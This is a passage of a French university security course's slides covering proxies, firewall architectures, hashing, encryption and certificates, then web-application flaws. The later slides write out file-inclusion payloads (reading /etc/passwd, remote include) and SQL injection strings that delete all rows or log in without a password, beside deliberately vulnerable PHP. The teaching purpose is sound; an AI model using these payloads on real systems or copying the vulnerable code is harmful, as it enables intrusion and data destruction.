Les relais de sortie doivent refuser l’entrée
Préférer les relais applicatifs si possible

[email protected] Sécurité Informatique/ March 2, 2020 236 / 459


Relais circuit : Options courantes

Chiffrement entre le client et le relais


Authentification
Tunneling

[email protected] Sécurité Informatique/ March 2, 2020 237 / 459


Relais circuit : Exemples

Un seul exemple définit par une RFC (dite AFT advanced


Firewall Traversal)
Les socks
Plusieurs implémentations (dont certaines gratuites)
Nec (serveur et client)
Hummingbird (client)
Dante (serveur et client unix)
Msproxy (en partie)

[email protected] Sécurité Informatique/ March 2, 2020 238 / 459


Les relais applicatifs

Les relais applicatifs

[email protected] Sécurité Informatique/ March 2, 2020 239 / 459


Relais applicatifs : Définition

Le client fait une demande de connexion au relais dans le


même protocole
Le relais traite la demande et la retransmet au serveur
Il renvoie la réponse au client
La communication C-R est conforme au protocole relayé
R comprend la communication
R peut intervenir dans la communication
Squid : accélération, transforme les urls, etc.
Sendmail/Postfix : ajoutent des entêtes

[email protected] Sécurité Informatique/ March 2, 2020 240 / 459


Relais applicatifs : Avantages

Compréhension totale du protocole


Filtrage extrêmement fin
Journalisation complète
Protection plus efficace
Authentification facilement intégrable
Nombreuses fonctionnalités complémentaires
Parfois seul moyen de passer (X11)
Utilisés en relais d’entrée, ils protègent efficacement les
serveurs

[email protected] Sécurité Informatique/ March 2, 2020 241 / 459


Relais applicatifs : Inconvénients

Il faut un relais par protocole


Il y a peu de protocoles relayés
C’est le plus lent des relais
Consommateur de CPU
Plus complexe, et donc plus vulnérable
Chaque logiciel doit-être configuré (sauf si redirection
transparente)

[email protected] Sécurité Informatique/ March 2, 2020 242 / 459


Relais applicatifs : options courantes

Lutte antivirale
Filtrage d’action (put, get pour le ftp)
Filtrage d’URLs
Cache (optimisation du trafic)
Authentification

[email protected] Sécurité Informatique/ March 2, 2020 243 / 459


Relais applicatifs : Trucs

Penser à empêcher l’entrée par leur biais


Attention aux modules génériques qui n’ont pas les avantages
des relais applicatifs (voir relais circuit)
Ne pas croire qu’ils sont la panacée !! (httptunnel)

[email protected] Sécurité Informatique/ March 2, 2020 244 / 459


Relais applicatifs : Exemples

Squid (http, https, ftp)


Fwtk (http, ftp, telnet, X11, rlogin, pop, sqlnet générique
(TCP)). Mais ne bouge plus depuis plusieurs années.
Serveurs SMTP, DNS, NTP (par définition)

[email protected] Sécurité Informatique/ March 2, 2020 245 / 459


Relais applicatifs : Exercice

Installation d’un relais Squid + SquidGuard


Apt-get install squid
Apt-get install squidGuard
Apt-get install chastity-list
Squid.conf (url_rewrite_program /usr/bin/squidGuard -c
/etc/chastity/squidGuard-chastity.conf)

[email protected] Sécurité Informatique/ March 2, 2020 246 / 459


Le mélange des genres

Complémentarité visible
Quelques pare-feu intègrent 2 processus
Filtrage stateful qui renvoie vers
des Relais applicatifs transparents

[email protected] Sécurité Informatique/ March 2, 2020 247 / 459


Choix entre ces 4 (5) types

Dépend
De la sécurité exigée
De la vitesse nécessaire
Du budget disponible
Des exigences des utilisateurs
Rarement limité à un seul type
Ils sont très complémentaires.
Les relais ne sont rien sans des interdictions

[email protected] Sécurité Informatique/ March 2, 2020 248 / 459


Les astuces générales

Utiliser un serveur Syslog centralisé


Synchroniser les horloges par NTP
Bien segmenter son réseau (règles simples)
Eviter de nuire aux utilisateurs !!!!

[email protected] Sécurité Informatique/ March 2, 2020 249 / 459


Pare-feu : le faire soi-même

Choisir un OS bien maîtrisé


Ne PAS ENCORE LE CONNECTER
Partitionner correctement le disque (/var)
Patcher l’OS et les logiciels
Pas de compte utilisateur
Enlever les services non indispensables
Faire une synchronisation NTP du PF

[email protected] Sécurité Informatique/ March 2, 2020 250 / 459


Pare-feu : le faire soi-même : mode paranoiaque

Limitez les logiciels


chroot et chuid des processus (UNIX)
Un uid par processus
Application de patch noyaux durcis
grsecurity http://www.grsecurity.net
openwall http://www.openwall.com
Selinux

[email protected] Sécurité Informatique/ March 2, 2020 251 / 459


Pare-feu : le faire soi-même : mode paranoiaque

Mettre ce qui possible en immuable


chmod +t en unix
monter les partitions en Read Only
Faire une empreinte du système
Tripwire http://www.tripwire.org

[email protected] Sécurité Informatique/ March 2, 2020 252 / 459


Les architectures

Les architectures

[email protected] Sécurité Informatique/ March 2, 2020 253 / 459


Les architectures disponibles

Leur fonctionnement dépend des pare-feux utilisés


Les architectures dépendent
Du budget
Du temps disponible
Des compétences locales
Des choix de la politique de sécurité

[email protected] Sécurité Informatique/ March 2, 2020 254 / 459


Bastion externe

Réseau extérieur

Pare-feu

Ressources privées

Ressources publiques

Zone dangereuse

Zone semi-protégée

Zone protégée

[email protected] Sécurité Informatique/ March 2, 2020 255 / 459


Bastion externe

Les plus
Protège tout le réseau
L’accès aux serveurs publics est rapide
Les moins
Si le serveur public est compromis ....
Si le PF est compromis ....

[email protected] Sécurité Informatique/ March 2, 2020 256 / 459


Bastion interne

[email protected] Sécurité Informatique/ March 2, 2020 257 / 459


Bastion interne

Les plus
Si les serveurs publics compromis => PF
Les moins
Les serveurs publics sont moins accessibles
Si le PF est compromis ....

[email protected] Sécurité Informatique/ March 2, 2020 258 / 459


DMZ ou Zone Semi-Ouverte

[email protected] Sécurité Informatique/ March 2, 2020 259 / 459


DMZ

Les plus
Tout le réseau est protégé
Si serveurs publics compromis => PF2
Si PF1 compromis => PF2
Les moins
Les serveurs publics sont moins accessibles (sauf si PF2
filtrant)

[email protected] Sécurité Informatique/ March 2, 2020 260 / 459


DMZ : PF à interfaces multiples

[email protected] Sécurité Informatique/ March 2, 2020 261 / 459


DMZ : PF à interfaces multiples

Les plus
Moins cher
Plus facile à administrer
Même technologie pour toutes les DMZ
Les moins
Si PF compromis ...
Règles plus complexes

[email protected] Sécurité Informatique/ March 2, 2020 262 / 459


DMZ : compléments

Combien de DMZ ?
1 pour les serveurs publics
1 pour les entrées
1 pour les sorties
....

[email protected] Sécurité Informatique/ March 2, 2020 263 / 459


Architecture : choix à effectuer

Quels sont les types de PF utilisés ?


Les clients internes sortent-ils directement ?
Plus souple, plus rapide, moins sûr
Les clients sont-ils obligés de "relayer" ?
Plus sûr, moins rapide, moins souple

[email protected] Sécurité Informatique/ March 2, 2020 264 / 459


Architecture : trucs

Mettre un serveur syslog à l’intérieur


Empêcher le DNS de résoudre les adresses IP internes pour
l’extérieur
Les serveurs publics sont des semi-copies de serveurs internes
LDAP, Web, etc..

[email protected] Sécurité Informatique/ March 2, 2020 265 / 459


Critères de choix

Pas de "meilleur" pare-feu, uniquement un plus adapté que les


autres.
Position dans l’organisme (en entrée, devant un laboratoire)
Hiérarchie des priorités
Vitesse
Protection entrante
Protection sortante

[email protected] Sécurité Informatique/ March 2, 2020 266 / 459


Définir ses besoins :Quel trafic ?

Faire une analyse de trafic


Mettre un NIDS
Analyser les attaques
Permet de justifier des budgets (surtout s’il y a de beaux
graphiques)

[email protected] Sécurité Informatique/ March 2, 2020 267 / 459


Vérifier son pare-feu

NMAP
Services visibles par un pirate
Filterrules
Analyse des filtres réellement en place
NIDS après le PF
Vérifie que rien ne passe.

[email protected] Sécurité Informatique/ March 2, 2020 268 / 459


Gérer son pare-feu

Configurer
Interface graphique ?
Console ?
A distance ?
Console d’administration centrale
Par telnet ou ssh
Sur la console ?

[email protected] Sécurité Informatique/ March 2, 2020 269 / 459


Pare-feu : l’arme absolue ?

Avez-vous vu passer NIMDA ?


Compléments indispensables
IDS et NIDS
Anti-Virus
Suivre l’actualité sécuritaire
Problèmes de légalité

[email protected] Sécurité Informatique/ March 2, 2020 270 / 459


Le chiffrement

Le Chiffrement

[email protected] Sécurité Informatique/ March 2, 2020 271 / 459


Le chiffrement

Les condensats (Hash)


La signature
Le chiffrement symétrique
Le chiffrement asymétrique
Les certificats

[email protected] Sécurité Informatique/ March 2, 2020 272 / 459


Hashage : définition

Transformation d’une suite d’octets de longueur généralement


quelconque en une suite de longueur finie,
Souvent appelé "condensat",
Génère une "empreinte" pseudo-unique,
Cette opération est constante (même fichier, même hash),
Cette opération est non réversible.

[email protected] Sécurité Informatique/ March 2, 2020 273 / 459


Hashage : utilité

Le "Hash" est utilisé pour garantir l’intégrité des données


Il permet de vérifier l’égalité d’un mot de passe, sans en
conserver l’original
Une petite modification du fichier original donne une grande
variation du Hash (généralement)

[email protected] Sécurité Informatique/ March 2, 2020 274 / 459


Exemples de Hashage

Le crypt unix
"password" → "5GKtdsqlkgy"
Le CRC (Compute Redondancy Check)
le sum unix
SHA-1 (Shamir)
MD5 (Rivest)

[email protected] Sécurité Informatique/ March 2, 2020 275 / 459


Hash de mot de passe : bcrypt et argon2

à réserver aux de mots de passe : ils sont très longs


même les mots de passe "simples" deviennent coûteux à
casser.
bcrypt
c’est le standard actuel
basé sur blowfish
argon2
a gagné le concours 2015 du meilleur algo de hash de mot de
passe
2 versions : l’une résiste mieux au GPU, l’autre aux
"side-channels".

[email protected] Sécurité Informatique/ March 2, 2020 276 / 459


Hashage : utilisation pour les mots de passe

Génération :
Alice choisit son mot de passe M1
Le système "hashe" M1 pour obtenir HASH1
Le système ne conserve que HASH1
Utilisation
Alice se reconnecte, en tapant le mot de passe M2
(normalement identique à M1)
Le système hashe M2 et obtient HASH2
Si HASH2=HASH1 alors M2=M1, donc OK
Option : on peut ajouter un "sel" pour complexifier le
craquage des mots de passe.

[email protected] Sécurité Informatique/ March 2, 2020 277 / 459


Vocabulaire

Coder : rendre inintelligible une information à l’aide d’un code


Décoder : rendre intelligible une information préalablement
codée à l’aide de la clé
Décrypter : décoder mais sans le code
Chiffrer=coder
Crypter : en théorie n’existe pas
Pour plus d’information:
http://michel.arboi.free.fr/cryptFAQ/

[email protected] Sécurité Informatique/ March 2, 2020 278 / 459


Pièges du chiffrement

Un chiffrement sans clé est un mauvais chiffrement


Un chiffrement "fermé" est un mauvais chiffrement
Faire un bon chiffremernt est compliqué
Un bon chiffrement "théorique", s’il est mal appliqué devient
un mauvais code (exemple du chiffrement WEP pour le Wi-Fi)
Réutiliser une clé fragilise plus ou moins le processus de
chiffrement.

[email protected] Sécurité Informatique/ March 2, 2020 279 / 459


Chiffrement symétrique

Les clés de chiffrement et de déchiffrement sont identiques


Les algorithmes de chiffrement et déchiffrement ne sont pas
forcément identiques.
Pour communiquer il faut que Alice et Bob soient tous les 2
au courant de la clé, ce qui signifie un échange préalable

[email protected] Sécurité Informatique/ March 2, 2020 280 / 459


Chiffrement symétrique

Alice

Algorithme Bob
Message de
chiffrement Message chiffré
Algorithme
de Message
déchiffrement
Clé
de
Chiffrement

[email protected] Sécurité Informatique/ March 2, 2020 281 / 459


Chiffrement symétrique : exemples

Exemples à transposition
Code de Vigenère
XOR
Exemples à permutation
DES (64 bits), et triple DES (3DES)
IDEA
AES (actuel standard de l’armée US)

[email protected] Sécurité Informatique/ March 2, 2020 282 / 459


Chiffrement symétrique : caractéristiques

Les chiffrements et déchiffrements sont rapides


Leur décryptage peut être très long
64 bits = 8 octets = 1,8 x 1019 possibilités
à 1 million de tests par seconde
1,8 x 1013 secondes soit 5800 siècles
AES est disponible en version 128,192 et 256 bits

[email protected] Sécurité Informatique/ March 2, 2020 283 / 459


Chiffrement symétrique : DES

Ancien standard
56 bits (64 - 8 réservés à la parité)
version renforcée : le triple DES, mais à 2 clés. Efficacité de
113 bits
Bloc de permutation de 64 bits

[email protected] Sécurité Informatique/ March 2, 2020 284 / 459


Chiffrement symétrique : AES

http://www.securiteinfo.com/crypto/aes.shtml
Nouveau standard (il s’appellait Rijndael à l’origine après un
concours de la NSA)
Auteurs Rijmen et Daemen
Plusieurs versions de 128,192 ou 256 bits
Plus rapide que DES (il ne travaille qu’avec des entiers)

[email protected] Sécurité Informatique/ March 2, 2020 285 / 459


Chiffrement asymétrique

On génère 2 clés inter-dépendantes appelées


clé publique (qui a vocation à être largement distribuée)
clé privée (qui doit absolument être protégée)
Ce qui est chiffrée par l’une est déchiffrable par l’autre, et
uniquement elle !
Il est mathématiquement impossible, dans des temps
"humains" de déduire une clé depuis l’autre.

[email protected] Sécurité Informatique/ March 2, 2020 286 / 459


Chiffrement asymétrique

Alice

Clé publique
de Bob
Publication
sur Internet Algorithme
de
Message chiffrement

Bob

Clé publique
de Bob
Génération
du bi-clé
Algorithme
Clé privée
de Message
de Bob
déchiffrement

Message chiffré

[email protected] Sécurité Informatique/ March 2, 2020 287 / 459


Chiffrement asymétrique : avantages

La clé publique est ... publique


On peut signer les messages avec ce chiffrement (cf la suite)

[email protected] Sécurité Informatique/ March 2, 2020 288 / 459


Chiffrement asymétrique : inconvénients

Le chiffrement est moins résistant (2048 bits RSA = 128 bits


AES),
Il est plus sensible aux progrès mathématiques,
Il est beaucoup plus lent (puissance CPU occupée de 50 à 100
fois plus importante)

[email protected] Sécurité Informatique/ March 2, 2020 289 / 459


Chiffrement asymétrique : exemples

Méthodes
R.S.A.
Diffie Helmann
El Gamal (logarithme discret)
Courbes elliptiques
Outils
PGP
GPG
Openssl

[email protected] Sécurité Informatique/ March 2, 2020 290 / 459


Chiffrement asymétrique : PGP

Pretty Good Privacy


Auteur : Phil R. Zimmermann
Basé sur RSA
Notion d’anneau de confiance
A l’origine du standard OpenPGP (RFC 2440)

[email protected] Sécurité Informatique/ March 2, 2020 291 / 459


Chiffrement asymétrique : GPG

GNU Privacy Guard


Logiciel libre
Compatible avec PGP
http://www.hsc/ressources/breves/gpg.html

[email protected] Sécurité Informatique/ March 2, 2020 292 / 459


Chiffrement asymétrique : RSA

Auteurs : Rivest, Shamir et Adelman


Basé sur la factorisation de nombres premiers
Le plus connu des chiffrements asymétriques

[email protected] Sécurité Informatique/ March 2, 2020 293 / 459


Chiffrement : réalité

Chiffrement asymétrique est lent, et le chiffrement symétrique


inutilisable
D’où l’idée
On échange des clés de session symétriques en les codant avec
un chiffrement asymétrique
Puis on décode en symétrique

[email protected] Sécurité Informatique/ March 2, 2020 294 / 459


Cassage de clé : en 1995

Qui budget Moyen Temps Coût Clé sûre


Hacker de passage 0,00 € ordinateur 1 semaine 45
Hacker de passage 400,00 € FPGA 5 heures 8 cents 50
Petite entreprise 10.000,00 € FPGA 12 minutes 55
Service moyen 300.000,00 € FPGA 24 secondes 60
Grosse entreprise 10.000.000,00 € FPGA 0,7s 65
Grosse entreprise 10.000.000,00 € ASIC 5 ms 0,1 cents 70
NSA,DCRI,GRU 300.000.000,00 € ASIC 0,2ms 0,1 cents 75

[email protected] Sécurité Informatique/ March 2, 2020 295 / 459


Cassage de code : décryptage

La puissance processeur double tous les 18 mois (loi de Moore)


Progrès mathématiques sur les chiffrements asymétriques :
rapidité doublée tous les 18 mois avec des sauts sporadiques
Budget d’un attaquant double tous les 10 ans
Actuellement (http://hashcat.net) pour une AMD 7970
(150 €)
8,5 milliards de MD5 par seconde
416 Millions de SHA512 par seconde
179 Millions de SHA-3 par seconde
141000 WPA2 par seconde

[email protected] Sécurité Informatique/ March 2, 2020 296 / 459


Cassage de clé : évolution

La vision en 2001 :
1982 1992 2002 2012 2022 2032
symétrique 56 64 72 80 87 95
RSA/log discret 417 682 1028 1464 1995 2629
DSS 102 114 127 141 154 168
Courbes elliptiques 135 149 164 179

La recommandation actuelle en 2017 du BSI (Allemand)


128 bits pour du symétrique
2000 bits pour du RSA
250 bits pour de l’elliptique et de l’algorithme discret
Référence : EPFL 2001
Référence : keylength

[email protected] Sécurité Informatique/ March 2, 2020 297 / 459


Chiffrement asymétrique : Signature

La signature est la garantie


de l’identité de l’expéditeur du message
de l’intégrité du message
La procédure
On prend l’empreinte du message
On la code avec sa clé privée
On l’expédie
Le destinataire décode l’empreinte avec la clé publique et
compare les 2 empreintes

[email protected] Sécurité Informatique/ March 2, 2020 298 / 459


Chiffrement asymétrique : Signature

Alice
Bob Message
Algo Hash Clé publique
Message Message Hash codé
Algo Chiffrement de Bob
Hash Codé

Algorithme Algorithme Algorithme


de de de
hashage hashage déchiffrement

Clé privée
Hash Hash Hash déchiffré
de Bob

Algorithme
de Comparaison
chiffrement

Hash chiffré

[email protected] Sécurité Informatique/ March 2, 2020 299 / 459


Autorité de certification

A qui appartient la clé publique ?


Possibilité d’usurpation d’identité
Utilisateur
Machine
Problème de confiance
Notion de tiers de confiance
Notion d’autorité de certification

[email protected] Sécurité Informatique/ March 2, 2020 300 / 459


Autorité de certification : création

Une "autorité de certification" est désignée "d’un commun


accord" par sa communauté
Elle génère son bi-clé (couple clé publique/clé privée)
Elle génère un certificat auto-signé
Le certificat est délivré à chaque membre de la communauté.
Les membres l’intègrent dans les navigateurs.

[email protected] Sécurité Informatique/ March 2, 2020 301 / 459


Autorité de certification : création

Clé Publique
de Verisign
Verisign
Certificateur : Verisign
Clé publique Objet : Verisign
de Verisign
Chiffrement : RSA
Hashage : MD5
Hash Codé

hashage MD5

Clé privée
Hash
de Verisign

chiffrement RSA

Hash chiffré

[email protected] Sécurité Informatique/ March 2, 2020 302 / 459


Autorité de certification : certification

Un membre de la communauté crée son bi-clé


Il va auprès de l’Autorité d’enregistrement se faire reconnaître
et valider son certificat.
L’AE envoie la signature à l’AC
L’AC signe avec sa clé privée le certificat.
Le membre récupère le certificat et l’intègre dans son serveur.

[email protected] Sécurité Informatique/ March 2, 2020 303 / 459


Autorité de certification : certification

BNP

Génération Publication web

Clé privée Clé publique


de BNP de BNP

Verisign

Vérification
identité

Clé publique
de BNP

Clé Publique
de BNP
Certificateur : Verisign
hashage MD5 Objet : BNP
Chiffrement : RSA
Hashage : MD5
Hash Codé

Clé privée
Hash
de Verisign

chiffrement RSA

Hash chiffré

[email protected] Sécurité Informatique/ March 2, 2020 304 / 459


Autorité de certification : utilisation

L’utilisateur, membre de la communauté reçoit le certificat.


Il regarde dans le certificat l’AC.
Il la reconnaît et regarde si la signature du certificat est
exacte.

[email protected] Sécurité Informatique/ March 2, 2020 305 / 459


Autorité de certification : chaîne

Une AC peut-être membre d’une communauté avec elle-même


une AC
La vérification se répète :
Vérification du certificat (arrêt et validation si l’AC l’ayant
généré est reconnue)
Vérification du certificat de l’AC auprès de l’AC supérieure
(arrêt si celle-ci est reconnue).
Boucle jusqu’à
AC auto-certifiée (que l’utilisateur accepte ou non)
AC reconnue

[email protected] Sécurité Informatique/ March 2, 2020 306 / 459


Autorité de certification

Les navigateurs sont livrés avec des AC


Verisign
Comodo
etc..
Pas encore d’AC administrative française (En cours de
réflexion)
Les CRL

[email protected] Sécurité Informatique/ March 2, 2020 307 / 459


Preuve

Beaucoup de contraintes pour les signatures

[email protected] Sécurité Informatique/ March 2, 2020 308 / 459


Certificats : Une norme X509

Que contient un certificat ?


Une clé publique
Un identifiant (email ou nom de machine)
Un rôle (chiffrement, signature, AC)
Des renseignements administratifs

[email protected] Sécurité Informatique/ March 2, 2020 309 / 459


Certificats : Une norme X509

Certificate:
Data:
Version: 1 (0x0)
Serial Number: 7829 (0x1e95)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc,
OU=Certification Services Division,
CN=Thawte Server CA/[email protected]
Validity
Not Before: Jul 9 16:04:02 1998 GMT
Not After : Jul 9 16:04:02 1999 GMT
Subject: C=US, ST=Maryland, L=Pasadena, O=Brent Baccala,
OU=FreeSoft, CN=www.freesoft.org/[email protected]
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:b4:31:98:0a:c4:bc:62:c1:88:aa:dc:b0:c8:bb:
...
d2:75:6b:c1:ea:9e:5c:5c:ea:7d:c1:a1:10:bc:b8:
e8:35:1c:9e:27:52:7e:41:8f
Exponent: 65537 (0x10001)
Signature Algorithm: md5WithRSAEncryption
93:5f:8f:5f:c5:af:bf:0a:ab:a5:6d:fb:24:5f:b6:59:5d:9d:
....
0d:19:aa:ad:dd:9a:df:ab:97:50:65:f5:5e:85:a6:ef:19:d1:

[email protected] Sécurité Informatique/ March 2, 2020 310 / 459


Les AC pré-chargées

[email protected] Sécurité Informatique/ March 2, 2020 311 / 459


Le chiffrement homomorphe et le chiffrement fonctionnel

récent : 2009 pour les vrais débuts


Le chiffrement homomorphe
permet de faire des "calculs" sur des données chiffrées
le résultat est chiffré.
Le chiffrement fonctionnel
périmètre principal : les bases de données
fournit des résultats "clairs" sur des données chiffrées

[email protected] Sécurité Informatique/ March 2, 2020 312 / 459


URLographie

http://michel.arboi.free.fr/cryptFAQ
http://www.ossir.org/resist/supports/cr/200203/
crypto.pdf
http://cr.yp.to/

[email protected] Sécurité Informatique/ March 2, 2020 313 / 459


Une faille c’est quoi ?

Un programme fait ce qu’on lui demande


pas plus pas moins
avec les éléments qu’on lui fournit
comment fait-il quand il se trouve dans des conditions non
prévues ?

[email protected] Sécurité Informatique/ March 2, 2020 314 / 459


Injection : Condition normale

Je vais dans une boulangerie. En condition normale (en omettant


le paiement) :

Elle m’a demandé une variable : le nombre de baguettes.

[email protected] Sécurité Informatique/ March 2, 2020 315 / 459


Injection : Le pirate

Le pirate entre dans une boulangerie.

Elle m’a demandé une variable, le pirate répond avec une variable
... suivie d’un ordre. Si le programme n’a pas prévu le cas, c’est
foutu.
Une solution ?
[email protected] Sécurité Informatique/ March 2, 2020 316 / 459
Débordement : Condition normale

En condition normale, je dépose ma commande à la boulangerie :

La serveuse traite les commandes, puis reprend la liste des choses à


faire.

[email protected] Sécurité Informatique/ March 2, 2020 317 / 459


Débordement : Le pirate

Le pirate dépose sa commande en espérant que la pile de sa


commande va déborder sur la liste des choses à faire

Bingo !!
[email protected] Sécurité Informatique/ March 2, 2020 318 / 459
Les applications web

Les failles d’un site web.

[email protected] Sécurité Informatique/ March 2, 2020 319 / 459


Problème générique des failles

Les failles sont dues à l’utilisation imprévue d’une variable pour


obtenir un comportement inattendu, mais contrôlé, plus ou moins
correctement, par le pirate.
La plupart des intrusions sur des sites web, contrairement à ce que
montre le cinéma, sont dûes à l’utilisation de failles de sécurité.
Les serveurs web étant souvent les seuls points accessibles, voyons
comment cela peut se passer.

[email protected] Sécurité Informatique/ March 2, 2020 320 / 459


Structure d’un service web

[email protected] Sécurité Informatique/ March 2, 2020 321 / 459


20 points de vulnérabilités

Du schéma précédent, on peut trouver 20 points de vulnérabilités :


Les logiciels
Les serveurs
Les scripts
Les modules
Les outils de protection (antivirus, antispyware, etc.)
Les OS
Les matériels
Les communications
L’utilisateur
Les protocoles

[email protected] Sécurité Informatique/ March 2, 2020 322 / 459


Les types de paramètres

Variables GET. Elles sont données dans l’URL de demande.


Variables POST. Fournies par un formulaire.
Variables Cookies. Variables conservées par le navigateur sur
son disque dur et généralement fournies par le serveur.
Variables SERVER (HTTP_USER_AGENT ou
HTTP_REFERER)

[email protected] Sécurité Informatique/ March 2, 2020 323 / 459


Les variables GET

Décrites dans l’URL.


http://www.google.com/search?p=html&hl=fr.
Ici 2 variables p et hl, avec les valeurs html et fr.
Généralement provenant d’une interrogation directe.
Dans le cas présent, plutôt rare, il s’agit d’envoi par formulaire
(method=GET).

[email protected] Sécurité Informatique/ March 2, 2020 324 / 459


Les variables POST

Remplies par un formulaire.


Utilisées quand on a un grand volume de données à envoyer.
Utilisées quand on a un grand nombre de variables.
Non tracées par les journaux des daemons (hormis modules
spécifiques).
Traitement particulier des variables Hidden qui sont cachées
pour l’utilisateur, mais pas pour le navigateur.

[email protected] Sécurité Informatique/ March 2, 2020 325 / 459


Les variables cookies

Notion de valise de variables stockées sur le client


Transmises de manière transparente dans la requête
C’est le serveur qui est sensé positionner ces variables pour
une durée limitée
Un serveur ne peut généralement (sauf faille de sécurité)
demander à accéder qu’aux variables :
Qu’il a lui-même positionnées.
Qu’une machine de son domaine a positionnées (et si celle-ci
l’a explicitement autorisé).

[email protected] Sécurité Informatique/ March 2, 2020 326 / 459


Les variables SERVER

Ces variables sont hétéroclites.


Celles que seul le serveur connait
Version du serveur
Répertoire de travail
Celles qui sont associées à la connexion
L’adresse du client REMOTE_ADDR
L’hôte appelé
Le port source
Celles qui proviennent du client
Le Referer : HTTP_REFERER
Le USER_AGENT
L’URL appelée

[email protected] Sécurité Informatique/ March 2, 2020 327 / 459


MUV : principe fondamental

Ces variables proviennent en majorité du client.


Il a donc tout pouvoir pour les modifier, effacer.
Les contrôles Javascript sont exécutés par le client ( s’il le
souhaite ! ).
Les contrôles de formulaire (taille, type) sont exécutés par le
client ( s’il le souhaite ! ).

[email protected] Sécurité Informatique/ March 2, 2020 328 / 459


MUV : Généralisation : Injection de code

Faille de sécurité : faire exécuter du code informatique


Ce code va être injecté par une "interface" pas prévue pour
Ce code dépend de qui va l’éxecuter et du vecteur d’injection

Nom Langage Vecteur Interpréteur/Victime


Buffer Overflow Assembleur Binaire Processeur
SQL Injection SQL web SGBD
LDAP Injection LDAP web annuaire LDAP
Injection shell, DOS, etc. web Interpréteur backoffice
XSS Javascript web navigateur
CSRF HTML web navigateur
script PDF Javascript PDF lecteur PDF

[email protected] Sécurité Informatique/ March 2, 2020 329 / 459


MUV : Quelques exemples

Variables sur les noms de fichier (ou les répertoires)


Variables dites superglobales
Variables dans les requêtes SQL (ou LDAP ou tout
interpréteur)
Variables pour du XSS

[email protected] Sécurité Informatique/ March 2, 2020 330 / 459


MUV : Sur les noms de fichiers

Exemple d’inclusion.
Soit le programme PHP suivant
<?
include ("header.inc");
$page=$_GET[’page’]; # On récupère la variable "page"
include ($page);
include ("footer.inc");
?>
que l’on utilise de la manière suivante
Utilisation
http://192.168.30.72/mep.php?page=toto.txt

[email protected] Sécurité Informatique/ March 2, 2020 331 / 459


MUV : Sur les noms de fichiers

Quelques attaques :
Exemples simples d’utilisation malveillante
http://192.168.30.72/mep.php?page=/etc/passwd
http://192.168.30.72/mep.php?
page=https://dsi.ut-capitole.fr/creufophacker.inc

On pourrait de la même manière utiliser les fonctions fopen,


require, etc.

[email protected] Sécurité Informatique/ March 2, 2020 332 / 459


MUV :Solution

Refuser les requêtes avec des caractères dangereux


<?
If (eregi("/",$page))
{die("Va jouer dans le mixer !")}
include ("header.inc");
include ($page);
include ("footer.inc");
?>
On doit aussi utiliser
La notion de "allow_url_fopen" et "allow_url_include" du
php.ini en les mettant à faux,
La notion de "open_basedir" en listant les répertoires autorisés
Empêcher l’utilisateur apache de sortir (avec un firewall en
sortie), on pourra aussi bloquer MySQL et proftpd.

[email protected] Sécurité Informatique/ March 2, 2020 333 / 459


MUV : Les injections SQL (ou LDAP)

Le SQL est un langage d’interrogation de base de données. C’est


un véritable langage de programmation, avec ses fonctions, ses
variables, ses commentaires.
Le principe des appels SQL en WWW, est que le langage (PHP
par exemple) crée une chaine de caractères (la commande SQL)
qui est ensuite envoyée au SGBD.
Le SGBD interprète et exécute le programme envoyé.

[email protected] Sécurité Informatique/ March 2, 2020 334 / 459


MUV : Les injections SQL ou LDAP

Utilisation
http://192.168.30.72/test_sql.php?id=3

Code du programme
$id=$_GET[’id’];
$sql_query="DELETE FROM matable WHERE id=$id";
mysql_connect($database);
mysql_query($database,$sql_query);

[email protected] Sécurité Informatique/ March 2, 2020 335 / 459


MUV : Les injections SQL première attaque

Les espaces doivent être remplacés par %20 en cas de GET


http://192.168.30.72/test_sql.php?id=3 OR 1=1

ce qui nous donne


Chaine envoyée au SGBD
DELETE FROM matable WHERE id=3 OR 1=1
Le résultat est la destruction de tous les enregistrements.

[email protected] Sécurité Informatique/ March 2, 2020 336 / 459


MUV : Les injections SQL 1bis

Code du programme
<?
$id=$_GET[’id’];
$sql_query="DELETE FROM matable WHERE id=$id AND user=’USER1’";
mysql_connect($database);
mysql_query($database,$sql_query);
?>

[email protected] Sécurité Informatique/ March 2, 2020 337 / 459


MUV : Les injections SQL attaque 1bis

On ajoute un commentaire
http://192.168.30.72/test_sql.php?id=3 OR 1=1 --

ce qui nous donne :


Chaine envoyée au SGBD
DELETE FROM matable WHERE id=3 OR 1=1 -- AND champ1=true

Le résultat est la destruction de tous les enregistrements, car la fin


du WHERE n’est pas prise en compte.

[email protected] Sécurité Informatique/ March 2, 2020 338 / 459


MUV : Les injections SQL attaque 1ter

Un commentaire peut suffire


http://192.168.30.72/[email protected] --

ce qui nous donne :


Chaine envoyée au SGBD
SELECT uid FROM user WHERE [email protected] -- AND password=

Le résultat est une identification sans mot de passe.

[email protected] Sécurité Informatique/ March 2, 2020 339 / 459


MUV : Les injections SQL attaque 1ter

Même chose avec un formulaire

ce qui nous donne :


Chaine envoyée au SGBD
SELECT uid FROM user WHERE [email protected] -- AND password=

Le résultat est une identification sans mot de passe.

[email protected] Sécurité Informatique/ March 2, 2020 340 / 459


MUV : Les injections SQL première solution

La première solution peut consister à modifier le programme en


ajoutant des quotes
Code du programme
$sql_query="DELETE FROM matable WHERE id=’$id’";

Le résultat de la première attaque devient alors


Code du programme
DELETE FROM matable WHERE id=’3 OR 1=1’

qui est sans danger.


Mais pourtant une faille existe encore

[email protected] Sécurité Informatique/ March 2, 2020 341 / 459


MUV : Les injections SQL deuxième attaque

Insérons une quote


http://192.168.30.72/test_sql.php?id=3’ OR 1=1 --

ce qui nous donne


Chaine envoyée au SGBD
DELETE FROM matable WHERE id=’3’ OR 1=1 -- ’

Le résultat est encore la destruction de tous les enregistrements.

[email protected] Sécurité Informatique/ March 2, 2020 342 / 459


MUV : Les injections SQL deuxième solution

La solution va passer par 2 possibilités


le magic_quotes_gpc à on (ATTENTION : les versions de
PHP influent !)
la fonction addslashes (idem)

Code du programme
$id=add_slashes($id);
$sql_query="DELETE FROM matable WHERE id=’$id’";

L’attaque précédente donne alors


Chaine envoyée au SGBD
DELETE FROM matable WHERE id=’3\’ OR 1=1’

Qui ne fait plus rien. Mais ce n’est toujours pas fini. Une faille
existe malgré cela.

[email protected] Sécurité Informatique/ March 2, 2020 343 / 459


MUV : Les injections SQL troisième attaque

Le but de magic_quotes_gpc est à ON. Mais il a des problèmes


